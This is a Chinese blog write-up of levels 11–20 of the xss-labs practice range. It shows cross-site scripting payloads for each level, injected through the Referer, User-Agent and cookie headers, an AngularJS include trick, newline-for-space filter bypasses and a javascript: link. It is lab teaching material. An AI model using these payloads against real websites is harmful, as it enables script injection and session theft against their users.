xss靶场11-20关详解

文章详细介绍了在一个系列的XSS挑战中,如何通过分析源码、抓包工具以及理解不同浏览器特性来构造有效的XSSpayload,包括利用referter、user-agent、cookie、AngularJS框架以及处理编码限制的方法,展示了Web安全中的跨站脚本攻击技巧。
摘要由CSDN通过智能技术生成

第十一关

只能发现一个写入点,就是url但是没有什么回显

查看源码,发现在有从第十关跳过来的referter

 发现应该是修改referter进行弹窗,打开burp抓包

构造payload: "οnmοuseοver='alert(1)' type='text'

 

第十二关

查看源码和十一关差不多,还是抓包修改 user-agent

 构造payload: " οnmοuseοut="alert(/xss/)"type="text"

 第十三关

进入页面打开源码进行查看,没有什么发现,就进行抓包看一下 数据包内容,发现cookie:user

构造payload: " onmouserout="alert(/xss/)"type="text"

 第十四关

存在错误直接进入第十五关

 第十五关

进入十五关,打开源码没有发现存在输入点,发现使用了angular.min.js框架开发

可以先使用src='level1.php'

 

直接构造poc src='level1.php?name=<img src=1 οnerrοr=alert(1)>'

 第十六关

发现script / 空格 都被编码了,不过可以使用%0a和%0d代替空格

构造payload: <img%0asrc=1%0aοnerrοr=alert(1)>

 

 第十七关

需要特定浏览器,换为chrome,arg01和arg02输入的内容会自动拼接

构造payload:arg01=a&arg02=b οnmοuseοver=alert(1)

 

第十八关

和十七关一样,区别可能在于这一关隐藏在不支持的插件中

 第十九关

这里就提供一个payload

arg01=version&arg02=<a href="javascript:alert(/xss/)">xss</a>

详情可以查看  xss-labs靶场-第十九关 FLASH XSS - FreeBuf网络安全行业门户

第二十关

可查看下面大佬写的

XSS-labs Level 20 Flash XSS_baynk的博客-CSDN博客

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值